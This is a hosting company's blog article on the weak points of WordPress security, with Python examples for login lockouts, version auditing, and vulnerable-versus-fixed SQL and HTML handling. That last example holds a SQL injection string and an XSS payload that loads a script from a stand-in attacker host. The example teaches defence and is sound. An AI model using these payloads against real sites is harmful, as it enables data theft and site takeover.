WordPress: Its Biggest Strength is also its Biggest Weakness

Tobias Schüring Last updated 21.01.2020

How secure is WordPress? Not particularly, because it comes with a number of serious built-in weaknesses. And because more than 28 percent of all websites currently run on WordPress, it is a popular target for attack. The good news: the most important weaknesses can be eliminated with very little effort.

The beauty of WordPress is that anyone can use it. All you need is an Internet connection and you are ready to go. WordPress security is a different story, perhaps precisely because not every user asks how secure WordPress actually is out of the box.

In any case, the very things that make WordPress strong, its enormous range of functions and the variety of designs, also make it insecure. The modular structure exposes a large attack surface, and of course attackers exploit it. They do so automatically, around the clock, 365 days a year.

But don't worry: these built-in weaknesses of WordPress can be eliminated easily, and to begin with entirely without an additional security plugin.

Of course, I don't want to talk you out of your security plugin. In some situations it makes a lot of sense. But securing your WordPress site is not finished once the plugin is installed. And before you start shadowboxing against phantom threats, it makes more sense to compensate for the basic weaknesses of WordPress first.

In detail, today we are dealing with

"But my site isn't interesting to hackers at all"

Make no mistake: this assumption is simply wrong. Every WordPress site is valuable to an attacker, for example as a spam relay, as part of a botnet, or as a host for phishing pages.

And the attacker does not care how small, new or rarely visited your site is. In the end, you and your business are the ones who suffer: your newsletter gets classified as spam, browsers warn users against visiting your site, and your Google ranking drops because your domain is on a blacklist.

In short: simply because of the popularity and prevalence of WordPress, every WordPress site is a prime target for attack, regardless of its content and purpose.

The WP admin area is particularly vulnerable

The login page is reachable by default under the well-known path /wp-admin (which redirects to /wp-login.php), so every installation presents the same door to the same knock; the XML-RPC endpoint xmlrpc.php, which apps and plugins use for remote logins, is hammered in the same way. That is why the login is the target of particularly frequent attacks, above all so-called brute force attacks. These are among the most common attacks on WordPress sites because they are very easy to automate. In a brute force attack the attacker simply tries to guess the right combination of username and password. If the password is weak or the login area is unprotected, the attack can either succeed, so that the attacker logs into your WordPress installation, or the sheer volume of login attempts can cripple your site.

Wordfence, the well-known maker of the security plugin of the same name, recorded an average of 34 million brute force attacks per day in March 2017 alone. By comparison, the so-called "complex attacks", i.e. those that exploit specific security vulnerabilities, ran at around 3.8 million per day.

Figure: Brute force attacks counted by Wordfence in March 2017. The plugin maker's March report shows an average of about 34 million brute force attacks per day, with a peak in the middle of the month.

And since Wordfence only counts the attacks that its own software blocked, the real number is higher still.

But the good news is: although attacking the WP admin area is easy and quickly automated, the countermeasures are just as simple. To secure your WP admin area, you can put up protective walls in three places:

  1. At WP level, through strong passwords
  2. At the login itself, by limiting the number of login attempts
  3. Before login, through a blacklist

1) The old chestnut: strong passwords

Brute force attacks are mindless: they just guess. A strong password is therefore often enough on its own to make the attack go nowhere. So let's keep it short: a strong password is mandatory. That means letters, numbers and special characters, upper and lower case, and, more important than any of these, length. And of course two-factor authentication makes sense too.

TIP: Password managers make it easy not only to create strong passwords but also to manage them. On Apple computers, the Keychain Access app, for example, offers a convenient way to manage your passwords offline. You only have to remember one master password (which should of course be as complex as possible). Cloud-based password managers such as 1Password, LastPass or X-Key Pass work the same way.

2) Limit the number of logins

You can see it clearly in the Wordfence figures: brute force attacks are the most frequent attacks on WordPress sites, so the probability that your site becomes the target of one is very high. To stop the flood of login attempts from burdening your site unnecessarily, you can limit them.

For example, an IP address is blocked for a certain time after three failed attempts. If it exceeds the limit again after the block expires, the blocking period grows with every repetition. In this way you very quickly reduce the number of possible guesses to the point where the attack becomes useless.

A low threshold also helps, to a degree, against attacks that rotate through several IP addresses, since each address then gets only a handful of guesses; against a distributed attack with thousands of addresses you additionally need a blacklist or a limit per user account. The easiest way to protect your login area is with plugins, for example WP Limit Login Attempts, Login Lockdown, or one of the big security plugins such as Sucuri, Wordfence or All in One WP Security. The sites of RAIDBOXES customers already come with server-side brute force protection, so an additional plugin is not necessary there.

3) Blacklisting

The employees of security companies such as Sucuri or Wordfence spend a large part of their working time analysing attacks, and they publish these analyses at regular intervals. One recurring aspect of these reports is the origin of the attacking IP addresses, because certain countries host a disproportionate number of the servers from which attacks originate.

Blacklisting the corresponding IP ranges therefore makes sense, especially when the region is not relevant to your target group. This way you repel attacks before they even reach your site. Keep in mind, though, that attackers can route through proxies or compromised hosts anywhere in the world, so a geographic blacklist reduces the noise but is not a complete defence on its own.

You can either maintain such a blacklist yourself at the server level (for example as deny rules in the web server or firewall), or use a security plugin with a corresponding function.
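Here is how the two server-side measures from this section and the previous one, an IP blacklist that is consulted before the login is even attempted and an escalating lockout after three failed attempts, fit together. This is an added example in Python for illustration (WordPress itself is PHP); it is not the RAIDBOXES server-side protection or the code of any plugin mentioned above, and the blacklist ranges, the threshold of three attempts, the five-minute base lockout and the one-day cap are assumptions.

```python
import time
import ipaddress
from dataclasses import dataclass, field
from typing import Callable, Dict

# Assumed blacklist; the ranges are RFC 5737 documentation addresses, not real attackers.
BLACKLIST = [ipaddress.ip_network(n) for n in ("198.51.100.0/24", "203.0.113.7/32")]
MAX_FAILURES = 3      # failed attempts tolerated before a lockout (assumption)
BASE_LOCKOUT = 300    # first lockout in seconds, i.e. five minutes (assumption)
MAX_LOCKOUT = 86400   # escalation is capped at one day (assumption)


@dataclass
class ClientState:
    failures: int = 0          # failed attempts since the last lockout or success
    lockouts: int = 0          # lockouts this address has already earned
    locked_until: float = 0.0  # unix time until which logins are refused


@dataclass
class LoginGuard:
    # The clock is injectable so the escalation can be simulated without waiting.
    clock: Callable[[], float] = time.time
    state: Dict[str, ClientState] = field(default_factory=dict)

    def is_blacklisted(self, ip: str) -> bool:
        addr = ipaddress.ip_address(ip)
        return any(addr in net for net in BLACKLIST)

    def check(self, ip: str) -> str:
        """Verdict for an incoming login request: 'blacklisted', 'locked' or 'allowed'."""
        if self.is_blacklisted(ip):          # wall 3: refused before the login is reached
            return "blacklisted"
        st = self.state.get(ip)
        if st is not None and self.clock() < st.locked_until:
            return "locked"                  # wall 2: still serving a lockout
        return "allowed"

    def record_failure(self, ip: str) -> int:
        """Count a failed login; returns the lockout imposed in seconds (0 if none yet)."""
        st = self.state.setdefault(ip, ClientState())
        st.failures += 1
        if st.failures < MAX_FAILURES:
            return 0
        # Threshold reached: lock out, doubling the period for every earlier lockout.
        st.lockouts += 1
        duration = min(BASE_LOCKOUT * 2 ** (st.lockouts - 1), MAX_LOCKOUT)
        st.locked_until = self.clock() + duration
        st.failures = 0
        return duration

    def record_success(self, ip: str) -> None:
        """A correct login clears the failure counter but keeps the lockout history."""
        if ip in self.state:
            self.state[ip].failures = 0


if __name__ == "__main__":
    now = [0.0]
    guard = LoginGuard(clock=lambda: now[0])
    print("203.0.113.7:", guard.check("203.0.113.7"))  # blacklisted before any attempt
    ip = "192.0.2.50"
    for attempt in range(1, 13):                         # every guess in this demo is wrong
        if guard.check(ip) == "locked":
            print(f"attempt {attempt}: refused, lockout still active")
            now[0] = guard.state[ip].locked_until + 1    # attacker waits the block out
            continue
        lock = guard.record_failure(ip)
        print(f"attempt {attempt}: failed" + (f", locked out for {lock}s" if lock else ""))
```

In a real deployment check() runs before the credentials are even looked at, so a locked or blacklisted client never costs a database query, which is what keeps the flood of attempts from slowing the site down.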

Outdated WordPress

WordPress is a modular system. It consists of the core, i.e. the core software, the plugins and the themes. One of the biggest dangers for WordPress installations is that many users do not update their system regularly.

The reasons vary, from incompatibilities with plugins and themes to ignorance or simply a lack of time for the update.

Figure: More than 70 percent of all WordPress sites are not running the current version. This statistic from WordPress.org shows that 72.5 percent of all WordPress installations are currently not running the latest version, and almost 40 percent are running versions older than 4.7.

Where delayed core updates can lead was demonstrated impressively at the beginning of 2017: in February, a security vulnerability in WordPress 4.7.1 became known, and users were urged to update to version 4.7.2 as quickly as possible.

Within a very short time the announcement provoked mass attacks on WordPress sites (the vulnerability was not publicly known before the official announcement). The makers of the corresponding security software again supply the figures: within just a few days, an estimated one and a half to two million sites were hacked, most of them defaced. The vulnerability had been discovered and reported to WordPress beforehand by the security company Sucuri.

Remember that more than 28 percent of all websites run on WordPress, and you get a pretty good idea of what could happen if such a vulnerability went unpatched at scale. It is therefore advisable to automate updates of the WordPress core or have them automated for you. WordPress already does this by default for minor releases; the behaviour is controlled by the WP_AUTO_UPDATE_CORE constant in wp-config.php, so check that nobody has switched it off.

This applies above all to the so-called minor updates, i.e. version numbers with three components, e.g. 4.7.4. These are the "security and maintenance releases" and should always be installed as soon as possible. Larger version jumps, e.g. from 4.7 to 4.8, are a different matter: there the focus is on new functions and user guidance, so testing against your plugins and themes first is reasonable.
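The distinction between a missed maintenance release and a missed major release is easy to automate for an operator who looks after several installations. The following is an added example in Python, not a WordPress tool: it reads the core version out of wp-includes/version.php (the file really does carry a $wp_version assignment) and reports what kind of update is pending. The excerpt of version.php and the release table are constructed stand-ins for a real file and for what a WordPress.org version check would return, so the script runs offline.

```python
import re

# Constructed excerpt of wp-includes/version.php from a stale install.
SAMPLE_VERSION_PHP = """<?php
/**
 * The WordPress version string.
 */
$wp_version = '4.7.1';

$wp_db_version = 38590;
"""

# Assumed newest maintenance release per branch and newest release overall;
# in practice these come from the WordPress.org version check.
BRANCH_LATEST = {"4.6": "4.6.6", "4.7": "4.7.5", "4.8": "4.8.1"}
LATEST = "4.8.1"

VERSION_RE = re.compile(r"""\$wp_version\s*=\s*['"]([0-9]+(?:\.[0-9]+)*)['"]""")


def parse_wp_version(php_source: str) -> str:
    """Extract the version string from the contents of wp-includes/version.php."""
    m = VERSION_RE.search(php_source)
    if not m:
        raise ValueError("no $wp_version assignment found")
    return m.group(1)


def version_tuple(v: str) -> tuple:
    # WordPress writes major releases with two components ("4.7") and
    # maintenance releases with three ("4.7.1"); pad so they compare cleanly.
    parts = [int(p) for p in v.split(".")]
    return tuple(parts + [0] * (3 - len(parts)))[:3]


def branch_of(v: str) -> str:
    """'4.7.1' -> '4.7': the major.minor branch that receives backported fixes."""
    return ".".join(v.split(".")[:2])


def audit(installed: str, branch_latest=BRANCH_LATEST, latest=LATEST) -> dict:
    """Report whether a security/maintenance release or a major release is pending."""
    newest_on_branch = branch_latest.get(branch_of(installed))
    security_update = (newest_on_branch is not None
                       and version_tuple(installed) < version_tuple(newest_on_branch))
    major_update = version_tuple(installed)[:2] < version_tuple(latest)[:2]
    return {"installed": installed,
            "security_update": security_update,   # install now
            "major_update": major_update}         # plan and test first


if __name__ == "__main__":
    print(audit(parse_wp_version(SAMPLE_VERSION_PHP)))
```

The check is split per branch on purpose: WordPress backports security fixes to older branches, so an install on 4.7.1 is behind on security even if you have decided to postpone the jump to 4.8, and the two findings call for different reactions.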

Obsolete Plugins and Themes

What is true for the WordPress core is of course also true for plugins and themes: outdated plugin versions very often contain known security vulnerabilities, and avoidable ones at that.

A security study on content management systems by the German Federal Office for Information Security (BSI) comes to a similar conclusion. The BSI data covers the period from 2010 to 2012: 80 percent of the officially reported vulnerabilities could be traced back to extensions, i.e. in most cases to plugins.

A search for exploits in the Exploit Database returned over 250 exploits for WordPress. The majority of the exploits entered there are for WordPress plugins.

- BSI (2013): "Security Study Content Management Systems (CMS)".

In practice, plugins are a favourite point of attack, and with more than 50,000 extensions in the official WordPress plugin directory, a very productive one. The starting point for such attacks are gaps in the plugin code.

Here it is important to understand: such gaps will always exist. A 100 percent secure system simply does not exist. And a plugin or theme that has not been updated for a while is not automatically insecure, even if the update frequency is a good indicator of how well a manufacturer supports its product. It may just as well be that no vulnerability has been discovered yet.

But if one is discovered, the plugin provider will (hopefully) ship an update that closes it. If not, SQL injections or cross-site scripting (XSS) become possible. With the former, attackers manipulate the database of your site. They can, for example, create new users with admin rights and then infect your site with malicious code or turn it into a spam relay.

XSS attacks are essentially about placing attacker-controlled JavaScript on your site. That way an attacker can, for example, inject forms into your pages that steal visitors' data, completely unobtrusively, over SSL and in an environment the visitor trusts.
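What both bugs look like in code, and what the fix looks like next to them, is shown below. This is an added example in Python for illustration and not code from the article or from WordPress: the in-memory SQLite table imitates the shape of the wp_users table, the entries and the two payloads are constructed, and the comments name the WordPress functions ($wpdb->prepare() and esc_html()) that play the role of the safe variants in real plugin code.

```python
import html
import sqlite3

# Constructed stand-in for wp_users; the password hashes are placeholders.
USERS = [("admin", "$P$BplaceholderHash1"), ("editor", "$P$BplaceholderHash2")]


def setup_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT)")
    conn.executemany("INSERT INTO wp_users (user_login, user_pass) VALUES (?, ?)", USERS)
    return conn


def find_user_vulnerable(conn: sqlite3.Connection, login: str) -> list:
    # The bug: the request parameter is pasted straight into the SQL text, the
    # way a careless plugin builds a query string for $wpdb->get_results().
    sql = f"SELECT ID, user_login FROM wp_users WHERE user_login = '{login}'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn: sqlite3.Connection, login: str) -> list:
    # The fix: a parameterised query, the equivalent of $wpdb->prepare().
    # The payload is now compared as a literal string and matches nothing.
    sql = "SELECT ID, user_login FROM wp_users WHERE user_login = ?"
    return conn.execute(sql, (login,)).fetchall()


def render_author_vulnerable(author: str) -> str:
    # The bug: user-supplied text is dropped into the page markup unchanged.
    return f'<p class="author">{author}</p>'


def render_author_safe(author: str) -> str:
    # The fix: HTML-escape before output, the equivalent of esc_html().
    return f'<p class="author">{html.escape(author, quote=True)}</p>'


# Constructed payloads: the first turns the WHERE clause into an always-true
# condition, the second loads a script from an attacker's host.
SQLI_PAYLOAD = "x' OR '1'='1"
XSS_PAYLOAD = '<script src="https://attacker.example/steal.js"></script>'


if __name__ == "__main__":
    conn = setup_db()
    print("vulnerable lookup:", find_user_vulnerable(conn, SQLI_PAYLOAD))  # every user leaks
    print("safe lookup:     ", find_user_safe(conn, SQLI_PAYLOAD))        # nothing matches
    print(render_author_vulnerable(XSS_PAYLOAD))                          # script tag survives
    print(render_author_safe(XSS_PAYLOAD))                                # rendered as text
```

The SELECT bypass is the smallest demonstration; the admin user described above is created by the same mechanism when the injectable query is an INSERT or UPDATE, or when the database allows stacked statements. Note that escaping is context-specific: esc_html() protects text inside an element, while attribute values, URLs and JavaScript each need their own escaping function.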

And because plugins and themes offer so many points of attack, keep an eye on the number of plugins you run, and do not just deactivate the ones you no longer need but really uninstall them: a deactivated plugin's files are still on the server, and a vulnerable file that can be called directly is still reachable for an attacker.

Shared hosting

These disadvantages are inherent in WordPress itself. But since your site has to get online somehow, hosting is also an important security aspect. Since security and hosting is a complex, many-sided topic, I only want to address the big disadvantage of shared hosting here. Again, I'm not talking you out of shared hosting; it makes a lot of sense, especially from a price perspective. But it comes with one major disadvantage that you should be aware of.

With shared hosting, several sites sit on one and the same server and share its IP address. This means that the state and behaviour of one site can negatively affect all the other sites on the server. This is called the bad neighbour effect, and it applies to spamming, for example: if one site on your server gets the IP address blacklisted, your site is affected too.

Resources can also be exhausted, for example when one of the sites on the server takes part in a DDoS attack or is itself the target of a massive attack. The stability of your own site is therefore always partly dependent on the security of the other sites on your server.

For professionally operated WordPress projects, a virtual or dedicated server therefore makes good sense. Hosters' security concepts of course also include backup solutions, firewalls and malware scanners, but we will discuss those in detail elsewhere.

Final thoughts

WordPress is insecure, and this is due to its modular structure. Its greatest strength can therefore become its greatest weakness. The good news is that you can easily compensate for this weakness. Basically it takes nothing more than care in user management and password creation, and discipline with updates.

Of course, these measures do not turn your site into Fort Knox. But they are the cornerstone of your security concept, because neglecting them can undermine every other security measure. And every WordPress user can influence these aspects themselves. That is why it is so important to always keep them in mind.

As a system administrator, Tobias watches over our infrastructure and finds every possible way to optimize the performance of our servers. His tireless efforts mean he can often be found on Slack in the early hours.
